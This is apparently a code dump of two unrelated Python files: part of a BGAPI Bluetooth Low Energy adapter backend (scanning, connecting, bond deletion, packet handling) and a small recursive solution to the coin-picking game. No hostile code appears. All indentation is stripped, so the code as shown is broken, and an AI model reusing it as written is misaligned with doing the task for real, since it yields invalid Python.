return self._lib.send_command(self._ser, *args, **kwargs)
def clear_bond(self, address=None):
"""
Delete the bonds stored on the adapter.
address - the address of the device to unbond. If not provided, will
erase all bonds.
Note: this does not delete the corresponding bond stored on the remote
device.
"""
# Find bonds
log.debug("Fetching existing bonds for devices")
self._stored_bonds = []
self.send_command(CommandBuilder.sm_get_bonds())
try:
self.expect(ResponsePacketType.sm_get_bonds)
except NotConnectedError:
pass
if self._num_bonds == 0:
return
while len(self._stored_bonds) < self._num_bonds:
self.expect(EventPacketType.sm_bond_status)
for b in reversed(self._stored_bonds):
log.debug("Deleting bond %s", b)
self.send_command(CommandBuilder.sm_delete_bonding(b))
self.expect(ResponsePacketType.sm_delete_bonding)
def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True,
discover_mode=constants.gap_discover_mode['observation'],
**kwargs):
"""
Perform a scan to discover BLE devices.
timeout -- the number of seconds this scan should last.
scan_interval -- the number of milliseconds until scanning is restarted.
scan_window -- the number of milliseconds the scanner will listen on one
frequency for advertisement packets.
active -- True --> ask sender for scan response data. False --> don't.
discover_mode -- one of the gap_discover_mode constants.
"""
parameters = 1 if active else 0
# NOTE: the documentation seems to say that the times are in units of
# 625us but the ranges it gives correspond to units of 1ms....
self.send_command(
CommandBuilder.gap_set_scan_parameters(
scan_interval, scan_window, parameters
))
self.expect(ResponsePacketType.gap_set_scan_parameters)
log.debug("Starting an %s scan", "active" if active else "passive")
self.send_command(CommandBuilder.gap_discover(discover_mode))
self.expect(ResponsePacketType.gap_discover)
log.debug("Pausing for %ds to allow scan to complete", timeout)
time.sleep(timeout)
log.debug("Stopping scan")
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
devices = []
for address, info in self._devices_discovered.items():
devices.append({
'address': address,
'name': info.name,
'rssi': info.rssi,
'packet_data': info.packet_data
})
log.debug("Discovered %d devices: %s", len(devices), devices)
self._devices_discovered = {}
return devices
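# Usage sketch (illustrative; the serial port is auto-detected if not given):
#     adapter = BGAPIBackend()
#     adapter.start()
#     for dev in adapter.scan(timeout=5):
#         print(dev['address'], dev['rssi'], dev['name'])
#     adapter.stop()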
def _end_procedure(self):
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
def connect(self, address, timeout=5,
address_type=BLEAddressType.public,
interval_min=60, interval_max=76, supervision_timeout=100,
latency=0):
"""
Connect directly to a device given the BLE address, then discover and
store the characteristic and characteristic descriptor handles.
Requires that the adapter is not connected to a device already.
address -- a bytearray containing the device mac address.
timeout -- number of seconds to wait before returning if not connected.
address_type -- one of BLEAddressType's values, either public or random.
Raises BGAPIError or NotConnectedError on failure.
"""
address_bytes = bytearray(unhexlify(address.replace(":", "")))
for device in self._connections.values():
if device._address == bgapi_address_to_hex(address_bytes):
return device
log.debug("Connecting to device at address %s (timeout %ds)",
address, timeout)
self.set_bondable(False)
if address_type == BLEAddressType.public:
addr_type = constants.ble_address_type['gap_address_type_public']
else:
addr_type = constants.ble_address_type['gap_address_type_random']
self.send_command(
CommandBuilder.gap_connect_direct(
address_bytes, addr_type, interval_min, interval_max,
supervision_timeout, latency))
try:
self.expect(ResponsePacketType.gap_connect_direct)
_, packet = self.expect(EventPacketType.connection_status,
timeout=timeout)
# TODO what do we do if the status isn't 'connected'? Retry?
# Raise an exception? Should also check that the address matches the
# expected one. TODO I'm finding that when reconnecting to the same
# MAC, we get a connection status of "disconnected", but that is
# picked up here as "connected", then we don't get anything
# else.
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['connected']):
device = BGAPIBLEDevice(
bgapi_address_to_hex(packet['address']),
packet['connection_handle'],
self)
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['encrypted']):
device.encrypted = True
self._connections[packet['connection_handle']] = device
log.info("Connected to %s", address)
return device
except ExpectedResponseTimeout:
# If we never get the connection status event, the connection
# most likely failed because the device isn't there. If so,
# we have to manually stop the pending connection attempt.
self._end_procedure()
exc = NotConnectedError()
exc.__cause__ = None
raise exc
def discover_characteristics(self, connection_handle):
att_handle_start = 0x0001 # first valid handle
att_handle_end = 0xFFFF # last valid handle
log.debug("Fetching characteristics for connection %d",
connection_handle)
self.send_command(
CommandBuilder.attclient_find_information(
connection_handle, att_handle_start, att_handle_end))
self.expect(ResponsePacketType.attclient_find_information)
self.expect(EventPacketType.attclient_procedure_completed,
timeout=10)
for char_uuid_str, char_obj in (
self._characteristics[connection_handle].items()):
log.debug("Characteristic 0x%s is handle 0x%x",
char_uuid_str, char_obj.handle)
for desc_uuid_str, desc_handle in (
char_obj.descriptors.items()):
log.debug("Characteristic descriptor 0x%s is handle 0x%x",
desc_uuid_str, desc_handle)
return self._characteristics[connection_handle]
@staticmethod
def _connection_status_flag(flags, flag_to_find):
"""
Is the given flag in the connection status flags?
flags -- the 'flags' parameter returned by ble_evt_connection_status.
flag_to_find -- the flag to look for in flags.
Returns true if flag_to_find is in flags. Returns false otherwise.
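For example (illustrative): _connection_status_flag(0b0101, 0b0001)
returns True, since the 0b0001 bit is set in 0b0101.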
"""
return (flags & flag_to_find) == flag_to_find
@staticmethod
def _get_uuid_type(uuid):
"""
Checks if the UUID is a custom 128-bit UUID or a GATT characteristic
descriptor UUID.
uuid -- the UUID as a bytearray.
Return a UUIDType.
"""
if len(uuid) == 16: # 128-bit --> 16 byte
return UUIDType.custom
if uuid in constants.gatt_service_uuid.values():
return UUIDType.service
if uuid in constants.gatt_attribute_type_uuid.values():
return UUIDType.attribute
if uuid in constants.gatt_characteristic_descriptor_uuid.values():
return UUIDType.descriptor
if uuid in constants.gatt_characteristic_type_uuid.values():
return UUIDType.characteristic
log.warn("Unrecognized 4 byte UUID %s", hexlify(uuid))
return UUIDType.nonstandard
def _scan_rsp_data(self, data):
"""
Parse scan response data.
Note: the data will come in a format like the following:
[data_length, data_type, data..., data_length, data_type, data...]
data -- the args['data'] list from _ble_evt_scan_response.
Returns a name and a dictionary containing the parsed data as
'field_name': value pairs.
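For example (illustrative), the byte sequence
[2, 0x01, 0x06, 5, 0x09, 0x41, 0x42, 0x43, 0x44]
encodes a one-byte 'flags' field (0x06) followed by the complete local
name "ABCD"; each length byte counts the type byte plus its data bytes.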
"""
# Result stored here
data_dict = {
# 'name': value,
}
bytes_left_in_field = 0
field_name = None
field_value = []
# Iterate over data bytes to put in field
dev_name = ""
for b in data:
if bytes_left_in_field == 0:
# New field
bytes_left_in_field = b
field_value = []
else:
field_value.append(b)
bytes_left_in_field -= 1
if bytes_left_in_field == 0:
# End of field
field_name = (
constants.scan_response_data_type[field_value[0]])
field_value = field_value[1:]
# Field type specific formats
if (field_name == 'complete_local_name' or
field_name == 'shortened_local_name'):
dev_name = bytearray(field_value).decode("utf-8")
data_dict[field_name] = dev_name
elif (field_name ==
'complete_list_128-bit_service_class_uuids'):
if len(field_value) % 16 == 0: # 16 bytes
data_dict[field_name] = []
for i in range(0, int(len(field_value) / 16)):
service_uuid = (
"0x%s" %
bgapi_address_to_hex(
field_value[i * 16:i * 16 + 16]))
data_dict[field_name].append(service_uuid)
else:
log.warning("Expected a service class UUID of 16\
bytes. Instead received %d bytes",
len(field_value))
else:
data_dict[field_name] = bytearray(field_value)
return dev_name, data_dict
def expect(self, expected, *args, **kargs):
return self.expect_any([expected], *args, **kargs)
def expect_any(self, expected_packet_choices, timeout=None,
assert_return_success=True):
"""
Process packets until a packet of one of the expected types is found.
expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon
processing a packet of a type contained in
the list, this function will return.
timeout -- maximum time in seconds to process packets.
assert_return_success -- raise an exception if the return code from a
matched message is non-zero.
Raises an ExpectedResponseTimeout if one of the expected responses is
not received within the time limit.
"""
timeout = timeout or 1
log.debug("Expecting a response of one of %s within %fs",
expected_packet_choices, timeout or 0)
start_time = None
if timeout is not None:
start_time = time.time()
while True:
packet = None
try:
packet = self._receiver_queue.get(
timeout=self._receive_queue_timeout)
except queue.Empty:
if timeout is not None:
if _timed_out(start_time, timeout):
exc = ExpectedResponseTimeout(
expected_packet_choices, timeout)
exc.__cause__ = None
raise exc
continue
if packet is None:
raise ExpectedResponseTimeout(expected_packet_choices, timeout)
packet_type, response = self._lib.decode_packet(packet)
return_code = response.get('result', 0)
log.debug("Received a %s packet: %s",
packet_type, get_return_message(return_code))
if packet_type in self._packet_handlers:
self._packet_handlers[packet_type](response)
if packet_type in expected_packet_choices:
return packet_type, response
def _receive(self):
"""
Read bytes from serial and enqueue the decoded packets; notification
values are additionally dispatched to the owning device.
Stops when the self._running event is cleared.
"""
log.debug("Running receiver")
while self._running.is_set():
packet = self._lib.parse_byte(self._ser.read())
if packet is not None:
decoded = self._lib.decode_packet(packet)
if decoded is None:
continue
packet_type, args = decoded
if (packet_type == EventPacketType.attclient_attribute_value and
args['connection_handle'] in self._connections):
device = self._connections[args['connection_handle']]
device.receive_notification(args['atthandle'],
bytearray(args['value']))
self._receiver_queue.put(packet)
log.debug("Stopping receiver")
def _ble_evt_attclient_attribute_value(self, args):
"""
Handles the event for values of characteristics.
args -- dictionary containing the attribute handle ('atthandle'),
attribute type ('type'), and attribute value ('value')
"""
log.debug("attribute handle = %x", args['atthandle'])
log.debug("attribute type = %x", args['type'])
log.debug("attribute value = 0x%s", hexlify(bytearray(args['value'])))
def _ble_evt_attclient_find_information_found(self, args):
"""
Handles the event for characteristic discovery.
Adds the characteristic to the dictionary of characteristics or adds
the descriptor to the dictionary of descriptors in the current
characteristic. These events will occur in an order similar to the
following:
1) primary service uuid
2) 0 or more descriptors
3) characteristic uuid
4) 0 or more descriptors
5) repeat steps 3-4
args -- dictionary containing the characteristic handle ('chrhandle'),
and characteristic UUID ('uuid')
"""
raw_uuid = bytearray(reversed(args['uuid']))
# Convert 4-byte UUID shorthand to a full, 16-byte UUID
uuid_type = self._get_uuid_type(raw_uuid)
if uuid_type != UUIDType.custom:
uuid = uuid16_to_uuid(int(
bgapi_address_to_hex(args['uuid']).replace(':', ''), 16))
else:
uuid = UUID(bytes=bytes(raw_uuid))
# TODO is there a way to get the characteristic from the packet instead
# of having to track the "current" characteristic?
if (uuid_type == UUIDType.descriptor and
self._current_characteristic is not None):
self._current_characteristic.add_descriptor(uuid, args['chrhandle'])
elif (uuid_type == UUIDType.custom or
uuid_type == UUIDType.nonstandard or
uuid_type == UUIDType.characteristic):
if uuid_type == UUIDType.custom:
log.debug("Found custom characteristic %s" % uuid)
elif uuid_type == UUIDType.characteristic:
log.debug("Found approved characteristic %s" % uuid)
elif uuid_type == UUIDType.nonstandard:
log.debug("Found nonstandard 4-byte characteristic %s" % uuid)
new_char = Characteristic(uuid, args['chrhandle'])
self._current_characteristic = new_char
self._characteristics[
args['connection_handle']][uuid] = new_char
def _ble_evt_connection_disconnected(self, args):
"""
Handles the event for the termination of a connection.
"""
self._connections.pop(args['connection_handle'], None)
def _ble_evt_connection_status(self, args):
"""
Handles the event for reporting connection status.
args -- dictionary containing the connection status flags ('flags'),
device address ('address'), device address type ('address_type'),
connection interval ('conn_interval'), connection timeout
('timeout'), device latency ('latency'), device bond handle
('bonding')
"""
connection_handle = args['connection_handle']
if not self._connection_status_flag(
args['flags'],
constants.connection_status_flag['connected']):
# Disconnected
self._connections.pop(connection_handle, None)
log.debug("Connection status: handle=0x%x, flags=%s, address=0x%s, "
"connection interval=%fms, timeout=%d, "
"latency=%d intervals, bonding=0x%x",
connection_handle,
args['flags'],
hexlify(bytearray(args['address'])),
args['conn_interval'] * 1.25,
args['timeout'] * 10,
args['latency'],
args['bonding'])
def _ble_evt_gap_scan_response(self, args):
"""
Handles the event for reporting the contents of an advertising or scan
response packet.
This event will occur during device discovery but not direct connection.
args -- dictionary containing the RSSI value ('rssi'), packet type
('packet_type'), address of packet sender ('sender'), address
type ('address_type'), existing bond handle ('bond'), and
scan response data list ('data')
"""
# Parse packet
packet_type = constants.scan_response_packet_type[args['packet_type']]
address = bgapi_address_to_hex(args['sender'])
name, data_dict = self._scan_rsp_data(args['data'])
# Store device information
if address not in self._devices_discovered:
self._devices_discovered[address] = AdvertisingAndScanInfo()
dev = self._devices_discovered[address]
if dev.name == "":
dev.name = name
if dev.address == "":
dev.address = address
if (packet_type not in dev.packet_data or
len(dev.packet_data[packet_type]) < len(data_dict)):
dev.packet_data[packet_type] = data_dict
dev.rssi = args['rssi']
log.debug("Received a scan response from %s with rssi=%d dBM "
"and data=%s", address, args['rssi'], data_dict)
def _ble_evt_sm_bond_status(self, args):
"""
Handles the event for reporting a stored bond.
Adds the stored bond to the list of bond handles.
args -- dictionary containing the bond handle ('bond'), encryption key
size used in the long-term key ('keysize'), was man in the
middle used ('mitm'), keys stored for bonding ('keys')
"""
# Add to list of stored bonds found or set flag
self._stored_bonds.append(args['bond'])
def _ble_rsp_sm_delete_bonding(self, args):
"""
Handles the response for the deletion of a stored bond.
args -- dictionary containing the return code ('result')
"""
result = args['result']
if result == 0:
self._stored_bonds.pop()
return result
def _ble_rsp_sm_get_bonds(self, args):
"""
Handles the response for the start of stored bond enumeration. Sets
self._num_bonds to the number of stored bonds.
args -- dictionary containing the number of stored bonds ('bonds'),
"""
self._num_bonds = args['bonds']
log.debug("num bonds = %d", args['bonds'])
|
nilq/baby-python
|
python
|
# Problem description: http://www.geeksforgeeks.org/dynamic-programming-set-31-optimal-strategy-for-a-game/
def optimal_strategy(coins):
if len(coins) == 1:
return coins[0]
elif len(coins) == 2:
return max(coins[0], coins[1])
else:
return max(coins[0] + min(optimal_strategy(coins[2:]),
optimal_strategy(coins[1:-1])),
coins[-1] + min(optimal_strategy(coins[1:-1]),
optimal_strategy(coins[:-2])))
coins = [8, 15, 3, 7]
print(optimal_strategy(coins))  # -> 22
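# A memoized variant (a sketch, not part of the original snippet) avoids the
# exponential blow-up of the plain recursion above by indexing subranges with
# (i, j) instead of slicing:
from functools import lru_cache

def optimal_strategy_dp(coins):
    coins = tuple(coins)  # immutable, so the cache key reduces to (i, j)

    @lru_cache(maxsize=None)
    def best(i, j):
        # Best achievable total for the player to move on coins[i..j].
        if i == j:
            return coins[i]
        if j == i + 1:
            return max(coins[i], coins[j])
        return max(coins[i] + min(best(i + 2, j), best(i + 1, j - 1)),
                   coins[j] + min(best(i + 1, j - 1), best(i, j - 2)))

    return best(0, len(coins) - 1)

print(optimal_strategy_dp(coins))  # same answer as above: 22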
|
nilq/baby-python
|
python
|